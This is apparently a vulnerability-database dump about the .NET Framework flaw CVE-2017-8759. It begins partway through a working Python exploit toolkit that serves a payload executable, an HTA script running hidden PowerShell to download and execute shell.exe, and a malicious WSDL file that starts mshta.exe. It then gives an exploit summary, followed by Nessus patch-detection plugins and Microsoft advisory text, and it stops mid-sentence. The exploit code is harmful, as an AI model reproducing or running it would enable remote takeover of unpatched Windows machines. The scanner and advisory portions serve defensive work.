fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0100000209000000010000000000000000000000000000008c010000c7b0abec197fd211978e0000f8757e2a00000000700100007700730064006c003d00\"+docuri_hex+docuri_pad+\"00ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000}\\n\" \npayload += \"{\\\\result {\\\\rtlch\\\\fcs1 \\\\af31507 \\\\ltrch\\\\fcs0 \\\\insrsid1979324 }}}}\\n\" \npayload += \"{\\\\*\\\\datastore }\\n\" \npayload += \"}\\n\" \nf = open(filename, 'w') \nf.write(payload) \nf.close() \nprint \"Generated \"+filename+\" successfully\" \n \ndef exploitation_rtf(): \n \nprint \"Server Running on \",host,\":\",port \n \ntry: \n# create a socket \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n \n# associate the socket to host and port \ns.bind((host, port)) \n \n# listenning \ns.listen(BACKLOG) \n \nexcept socket.error, (value, message): \nif s: \ns.close() \nprint \"Could not open socket:\", message \nsys.exit(1) \n \n# get the connection from client \nwhile 1: \nconn, client_addr = s.accept() \n \n# create a thread to handle request \nthread.start_new_thread(server_thread, (conn, client_addr)) \n \ns.close() \n \ndef server_thread(conn, client_addr): \n \n# get the request from browser \ntry: \nrequest = conn.recv(MAX_DATA_RECV) \nif (len(request) > 0): \n# parse the first line \nfirst_line = request.split('\\n')[0] \n \n# get method \nmethod = first_line.split(' ')[0] \ntry: \nurl = first_line.split(' ')[1] \nexcept IndexError: \nprint \"Invalid request from \"+client_addr[0] \nconn.close() \nsys.exit(1) \n \nif \".exe\" in url: \nprint \"Received request for payload from \"+client_addr[0] \ntry: \nsize = os.path.getsize(payloadlocation) \nexcept OSError: \nprint \"Unable to read \"+payloadlocation \nconn.close() \nsys.exit(1) \ndata = \"HTTP/1.1 200 OK\\r\\nDate: Sun, 16 Apr 2017 18:56:41 GMT\\r\\nServer: Apache/2.4.25 (Debian)\\r\\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: \"+str(size)+\"\\r\\nKeep-Alive: timeout=5, max=100\\r\\nConnection: Keep-Alive\\r\\nContent-Type: application/x-msdos-program\\r\\n\\r\\n\" \nwith open(payloadlocation) as fin: \ndata +=fin.read() \nconn.send(data) \nconn.close() \nsys.exit(1) \nif \".hta\" in url: \nprint \"Received GET method from \"+client_addr[0] \ndata = \"HTTP/1.1 200 OK\\r\\nDate: Sun, 16 Apr 2017 17:11:03 GMT\\r\\nServer: Apache/2.4.25 (Debian)\\r\\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 315\\r\\nKeep-Alive: timeout=5, max=100\\r\\nConnection: Keep-Alive\\r\\nContent-Type: application/hta\\r\\n\\r\\n<script>\\na=new ActiveXObject(\\\"WScript.Shell\\\");\\na.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\\\\'\"+payloadurl+\"\\\\', \\\\'c:/windows/temp/shell.exe\\\\'); c:/windows/temp/shell.exe', 0);window.close();\\n</script>\\r\\n\" \nconn.send(data) \nconn.close() \nif \".txt\" in url: \nprint \"Received GET method from \"+client_addr[0] \ndata = 'HTTP/1.1 200 OK\\r\\nDate: Sun, 16 Apr 2017 17:11:03 GMT\\r\\nServer: Apache/2.4.25 (Debian)\\r\\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 2000\\r\\nKeep-Alive: timeout=5, max=100\\r\\nConnection: Keep-Alive\\r\\nContent-Type: text/plain\\r\\n\\r\\n<definitions\\n xmlns=\"http://schemas.xmlsoap.org/wsdl/\"\\n xmlns:soap=\"http://schemas.xmlsoap.org/wsdl/soap/\"\\n xmlns:suds=\"http://www.w3.org/2000/wsdl/suds\"\\n xmlns:tns=\"http://schemas.microsoft.com/clr/ns/System\"\\n xmlns:ns0=\"http://schemas.microsoft.com/clr/nsassem/Logo/Logo\">\\n <portType name=\"PortType\"/>\\n <binding name=\"Binding\" type=\"tns:PortType\">\\n <soap:binding style=\"rpc\" transport=\"http://schemas.xmlsoap.org/soap/http\"/>\\n <suds:class type=\"ns0:Image\" rootType=\"MarshalByRefObject\"></suds:class>\\n </binding>\\n <service name=\"Service\">\\n <port name=\"Port\" binding=\"tns:Binding\">\\n <soap:address location=\"'+payloadurl.split(':')[0]+\"://\"+payloadurl.split('/')[2]+'?C:\\Windows\\System32\\mshta.exe?'+payloadurl.split(':')[0]+\"://\"+payloadurl.split('/')[2]+'/cmd.hta\"/>\\n <soap:address location=\";\\n if (System.AppDomain.CurrentDomain.GetData(_url.Split(\\'?\\')[0]) == null) {\\n System.Diagnostics.Process.Start(_url.Split(\\'?\\')[1], _url.Split(\\'?\\')[2]);\\n System.AppDomain.CurrentDomain.SetData(_url.Split(\\'?\\')[0], true);\\n } //\"/>\\n </port>\\n </service>\\n</definitions>\\n' \nconn.send(data) \nconn.close() \nsys.exit(1) \nexcept socket.error, ex: \nprint ex \n \nif __name__ == '__main__': \nmain(sys.argv[1:]) \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144148/cve-2017-8759_toolkit.py.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows .NET Framework - Remote Code Execution", "edition": 1, "published": "2017-09-13T00:00:00", "title": "Microsoft Windows .NET Framework - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8759"], "modified": "2017-09-13T00:00:00", "id": "EXPLOITPACK:BF5C8288A392CBC3E7947C012FB8E11E", "href": "", "sourceData": "Source: https://github.com/Voulnet/CVE-2017-8759-Exploit-sample\n\nRunning CVE-2017-8759 exploit sample.\n\nFlow of the exploit:\n\nWord macro runs in the Doc1.doc file. The macro downloads a badly formatted txt file over wsdl, which triggers the WSDL parser log. Then the parsing log results in running mshta.exe which in turn runs a powershell commands that runs mspaint.exe\n\nTo test:\n\nRun a webserver on port 8080, and put the files exploit.txt and cmd.hta on its root. For example python -m SimpleHTTPServer 8080\n\nIf all is good mspaint should run.\n\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42711.zip", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T05:44:25", "description": "The .NET Framework installation on the remote host is missing a\nsecurity update. It is, therefore, affected by the following\nvulnerability:\n\n - A remote code execution vulnerability exists when Microsoft .NET\n Framework processes untrusted input. An attacker who successfully\n exploited this vulnerability in software using the .NET framework\n could take control of an affected system. An attacker could then\n install programs; view, change, or delete data; or create new\n accounts with full user rights. Users whose accounts are\n configured to have fewer user rights on the system could be less\n impacted than users who operate with administrative user rights.\n (CVE-2017-8759)", "edition": 34, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-09-12T00:00:00", "title": "Security and Quality Rollup for .NET Framework (Sep 2017)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:microsoft:.net_framework"], "id": "SMB_NT_MS17_SEP_4041083.NASL", "href": "https://www.tenable.com/plugins/nessus/103137", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103137);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2017-8759\");\n script_bugtraq_id(100742);\n script_xref(name:\"MSFT\", value:\"MS17-4041086\");\n script_xref(name:\"MSKB\", value:\"4041093\");\n script_xref(name:\"MSFT\", value:\"MS17-4041093\");\n script_xref(name:\"MSKB\", value:\"4041083\");\n script_xref(name:\"MSFT\", value:\"MS17-4041083\");\n script_xref(name:\"MSKB\", value:\"4041090\");\n script_xref(name:\"MSFT\", value:\"MS17-4041090\");\n script_xref(name:\"MSKB\", value:\"4041084\");\n script_xref(name:\"MSFT\", value:\"MS17-4041084\");\n script_xref(name:\"MSKB\", value:\"4041091\");\n script_xref(name:\"MSFT\", value:\"MS17-4041091\");\n script_xref(name:\"MSKB\", value:\"4041085\");\n script_xref(name:\"MSFT\", value:\"MS17-4041085\");\n script_xref(name:\"MSKB\", value:\"4041092\");\n script_xref(name:\"MSFT\", value:\"MS17-4041092\");\n script_xref(name:\"MSKB\", value:\"4038781\");\n script_xref(name:\"MSFT\", value:\"MS17-4038781\");\n script_xref(name:\"MSKB\", value:\"4038783\");\n script_xref(name:\"MSFT\", value:\"MS17-4038783\");\n script_xref(name:\"MSKB\", value:\"4038782\");\n script_xref(name:\"MSFT\", value:\"MS17-4038782\");\n script_xref(name:\"MSKB\", value:\"4038788\");\n script_xref(name:\"MSFT\", value:\"MS17-4038788\");\n\n script_name(english:\"Security and Quality Rollup for .NET Framework (Sep 2017)\");\n script_summary(english:\"Checks the file versions.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a software framework installed that is\naffected by a security feature bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The .NET Framework installation on the remote host is missing a\nsecurity update. It is, therefore, affected by the following\nvulnerability:\n\n - A remote code execution vulnerability exists when Microsoft .NET\n Framework processes untrusted input. An attacker who successfully\n exploited this vulnerability in software using the .NET framework\n could take control of an affected system. An attacker could then\n install programs; view, change, or delete data; or create new\n accounts with full user rights. Users whose accounts are\n configured to have fewer user rights on the system could be less\n impacted than users who operate with administrative user rights.\n (CVE-2017-8759)\");\n # https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/5984735e-f651-e711-80dd-000d3a32fc99\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?39028b0b\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a9b7377f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Microsoft .NET Framework\n2.0 SP2, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_framework\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_dotnet_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"microsoft_net_framework_installed.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS17-09\";\nkbs = make_list(\n '4041086', # 2008 SP2 Cumulative Rollup All .Net\n '4041093', # 2008 SP2 Security Only Rollup All .Net\n '4041083', # 7 SP1 / 2008 R2 SP1 Cumulative Rollup All .Net\n '4041090', # 7 SP1 / 2008 R2 SP1 Security Only Rollup All .Net\n '4041084', # Server 2012 Cumulative Rollup All .Net\n '4041091', # Server 2012 Security Only Rollup All .Net\n '4041085', # 8.1 / 2012 R2 Cumulative Rollup All .Net\n '4041092', # 8.1 / 2012 R2 Security Only Rollup All .Net\n '4038781', # 10 RTM Cumulative Rollup All .Net\n '4038783', # 10 1511 Cumulative Rollup All .Net\n '4038782', # 10 1607 / Server 2016 Cumulative Rollup All .Net\n '4038788' # 10 1703 Cumulative Rollup All .Net\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\nelse if (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\napp = 'Microsoft .NET Framework';\nget_install_count(app_name:app, exit_if_zero:TRUE);\ninstalls = get_combined_installs(app_name:app);\n\nvuln = 0;\n\nif (installs[0] == 0)\n{\n foreach install (installs[1])\n {\n version = install['version'];\n if( version != UNKNOWN_VER &&\n smb_check_dotnet_rollup(rollup_date:\"09_2017\", dotnet_ver:version))\n vuln++;\n }\n}\nif(vuln)\n{\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, \"affected\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:31:00", "description": "The remote Windows host is missing multiple security updates released\non 2017/09/12. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. To exploit the vulnerability, an\n attacker on a guest operating system could run a\n specially crafted application that could cause the\n Hyper-V host operating system to disclose memory\n information. An attacker who successfully exploited the\n vulnerability could gain access to information on the\n Hyper-V host operating system. The security update\n addresses the vulnerability by correcting how Hyper-V\n validates guest operating system user input.\n (CVE-2017-8707)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console when it improperly\n parses XML input containing a reference to an external\n entity. An attacker who successfully exploited this\n vulnerability could read arbitrary files via an XML\n external entity (XXE) declaration. To exploit the\n vulnerability, an attacker could create a file\n containing specially crafted XML content and convince an\n authenticated user to open the file. The update\n addresses the vulnerability by modifying the way that\n the Windows System Information Console parses XML input.\n (CVE-2017-8710)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. To exploit this\n vulnerability, an attacker would have to log on to an\n affected system and run a specially crafted application.\n The security update addresses the vulnerability by\n correcting how the Windows kernel handles memory\n addresses. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. To exploit this\n vulnerability, an attacker would have to log on to an\n affected system and run a specially crafted application.\n The vulnerability would not allow an attacker to execute\n code or to elevate user rights directly, but it could be\n used to obtain information that could be used to try to\n further compromise the affected system. The update\n addresses the vulnerability by correcting the way in\n which the Windows Graphics Component handles objects in\n memory. (CVE-2017-8683)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. Users whose accounts are\n configured to have fewer user rights on the system could\n be less impacted than users who operate with\n administrative user rights. There are multiple ways an\n attacker could exploit this vulnerability. In a web-\n based attack scenario, an attacker could host a\n specially crafted website that is designed to exploit\n this vulnerability and then convince a user to view the\n website. An attacker would have no way to force users to\n view the attacker-controlled content. Instead, an\n attacker would have to convince users to take action,\n typically by getting them to click a link in an email\n message or in an Instant Messenger message that takes\n users to the attacker's website, or by opening an\n attachment sent through email. In a file sharing attack\n scenario, an attacker could provide a specially crafted\n document file that is designed to exploit this\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerabilities by correcting how the Windows font\n library handles embedded fonts. (CVE-2017-8682)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. To exploit the\n vulnerability, a user must open a specially crafted\n file. In an email attack scenario, an attacker could\n exploit the vulnerability by sending the specially\n crafted file to the user and then convincing the user to\n open the file. In a web-based attack scenario, an\n attacker could host a website (or leverage a compromised\n website that accepts or hosts user-provided content)\n that contains a specially crafted file designed to\n exploit the vulnerability. An attacker would have no way\n to force a user to visit the website. Instead, an\n attacker would have to convince a user to click a link,\n typically by way of an enticement in an email or Instant\n Messenger message, and then convince the user to open\n the specially crafted file. The security update\n addresses the vulnerability by helping to ensure that\n Windows Shell validates file copy destinations.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. To exploit this vulnerability, an attacker\n would have to log on to an affected system and run a\n specially crafted application. The security update\n addresses the vulnerability by correcting how the\n Windows kernel handles memory addresses. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. To exploit this vulnerability, an\n attacker would first have to log on to the system. An\n attacker could then run a specially crafted application\n that could exploit the vulnerability and take control of\n an affected system. The update addresses this\n vulnerability by correcting how Win32k handles objects\n in memory. (CVE-2017-8720)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. To exploit this\n vulnerability, an attacker would have to log on to an\n affected system and run a specially crafted application.\n The vulnerability would not allow an attacker to execute\n code or to elevate user rights directly, but it could be\n used to obtain information that could be used to try to\n further compromise the affected system. The security\n update addresses the vulnerability by correcting how the\n Windows GDI+ component handles objects in memory.\n (CVE-2017-8680, CVE-2017-8681, CVE-2017-8684,\n CVE-2017-8685)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights. There are\n multiple ways an attacker could exploit this\n vulnerability: In a web-based attack scenario, an\n attacker could host a specially crafted website designed\n to exploit this vulnerability and then convince a user\n to view the website. An attacker would have no way to\n force users to view the attacker-controlled content.\n Instead, an attacker would have to convince users to\n take action, typically by getting them to click a link\n in an email or instant message that takes users to the\n attacker's website, or by opening an attachment sent\n through email. In a file-sharing attack scenario, an\n attacker could provide a specially crafted document file\n designed to exploit this vulnerability and then convince\n a user to open the document file.The security update\n addresses the vulnerability by correcting how Windows\n Uniscribe handles objects in memory. (CVE-2017-8696)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. To exploit this vulnerability, an\n attacker would have to log on to an affected system and\n run a specially crafted application. The security update\n addresses the vulnerability by correcting how GDI+\n handles memory addresses. (CVE-2017-8688)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n To exploit the vulnerability, the attacker needs to be\n within the physical proximity of the targeted user, and\n the user's computer needs to have Bluetooth enabled. The\n attacker can then initiate a Bluetooth connection to the\n target computer without the user's knowledge. The\n security update addresses the vulnerability by\n correcting how Windows handles Bluetooth requests.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. To exploit this vulnerability, an attacker would\n have to log on to an affected system and run a specially\n crafted application. The vulnerability would not allow\n an attacker to execute code or to elevate user rights\n directly, but it could be used to obtain information\n that could be used to try to further compromise the\n affected system. The update addresses the vulnerability\n by correcting how the Windows kernel handles objects in\n memory. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. To exploit this vulnerability, an\n attacker would have to log on to an affected system and\n run a specially crafted application. Note that where the\n severity is indicated as Critical in the Affected\n Products table, the Preview Pane is an attack vector for\n this vulnerability. The security update addresses the\n vulnerability by correcting how GDI handles memory\n addresses. (CVE-2017-8676)", "edition": 30, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-09-12T00:00:00", "title": "Windows 2008 September 2017 Multiple Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8681", "CVE-2017-8741", "CVE-2017-8707", "CVE-2017-8685", "CVE-2017-8695", "CVE-2017-8682", "CVE-2017-8684", "CVE-2017-8710", "CVE-2017-8719", "CVE-2017-8699", "CVE-2017-8709", "CVE-2017-8683", "CVE-2017-8680", "CVE-2017-8678", "CVE-2017-8628", "CVE-2017-8696", "CVE-2017-8679", "CVE-2017-8687", "CVE-2017-8759", "CVE-2017-8676", "CVE-2017-8708", "CVE-2017-8688", "CVE-2017-8720", "CVE-2017-8733", "CVE-2017-8675"], "modified": "2017-09-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_WIN2008.NASL", "href": "https://www.tenable.com/plugins/nessus/103140", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103140);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\n \"CVE-2017-8628\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8680\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8684\",\n \"CVE-2017-8685\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8695\",\n \"CVE-2017-8696\",\n \"CVE-2017-8699\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8710\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8733\",\n \"CVE-2017-8741\",\n \"CVE-2017-8759\"\n );\n script_bugtraq_id(\n 100720,\n 100722,\n 100724,\n 100727,\n 100736,\n 100737,\n 100742,\n 100744,\n 100752,\n 100755,\n 100756,\n 100764,\n 100769,\n 100772,\n 100773,\n 100780,\n 100781,\n 100782,\n 100783,\n 100790,\n 100791,\n 100792,\n 100793,\n 100803,\n 100804\n );\n script_xref(name:\"MSKB\", value:\"4032201\");\n script_xref(name:\"MSFT\", value:\"MS17-4032201\");\n script_xref(name:\"MSKB\", value:\"4034786\");\n script_xref(name:\"MSFT\", value:\"MS17-4034786\");\n script_xref(name:\"MSKB\", value:\"4038874\");\n script_xref(name:\"MSFT\", value:\"MS17-4038874\");\n script_xref(name:\"MSKB\", value:\"4039038\");\n script_xref(name:\"MSFT\", value:\"MS17-4039038\");\n script_xref(name:\"MSKB\", value:\"4039266\");\n script_xref(name:\"MSFT\", value:\"MS17-4039266\");\n script_xref(name:\"MSKB\", value:\"4039325\");\n script_xref(name:\"MSFT\", value:\"MS17-4039325\");\n script_xref(name:\"MSKB\", value:\"4039384\");\n script_xref(name:\"MSFT\", value:\"MS17-4039384\");\n\n script_name(english:\"Windows 2008 September 2017 Multiple Security Updates\");\n script_summary(english:\"Checks the existence of Windows Server 2008 September 2017 Patches.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing multiple security updates released\non 2017/09/12. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. To exploit the vulnerability, an\n attacker on a guest operating system could run a\n specially crafted application that could cause the\n Hyper-V host operating system to disclose memory\n information. An attacker who successfully exploited the\n vulnerability could gain access to information on the\n Hyper-V host operating system. The security update\n addresses the vulnerability by correcting how Hyper-V\n validates guest operating system user input.\n (CVE-2017-8707)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console when it improperly\n parses XML input containing a reference to an external\n entity. An attacker who successfully exploited this\n vulnerability could read arbitrary files via an XML\n external entity (XXE) declaration. To exploit the\n vulnerability, an attacker could create a file\n containing specially crafted XML content and convince an\n authenticated user to open the file. The update\n addresses the vulnerability by modifying the way that\n the Windows System Information Console parses XML input.\n (CVE-2017-8710)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. To exploit this\n vulnerability, an attacker would have to log on to an\n affected system and run a specially crafted application.\n The security update addresses the vulnerability by\n correcting how the Windows kernel handles memory\n addresses. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. To exploit this\n vulnerability, an attacker would have to log on to an\n affected system and run a specially crafted application.\n The vulnerability would not allow an attacker to execute\n code or to elevate user rights directly, but it could be\n used to obtain information that could be used to try to\n further compromise the affected system. The 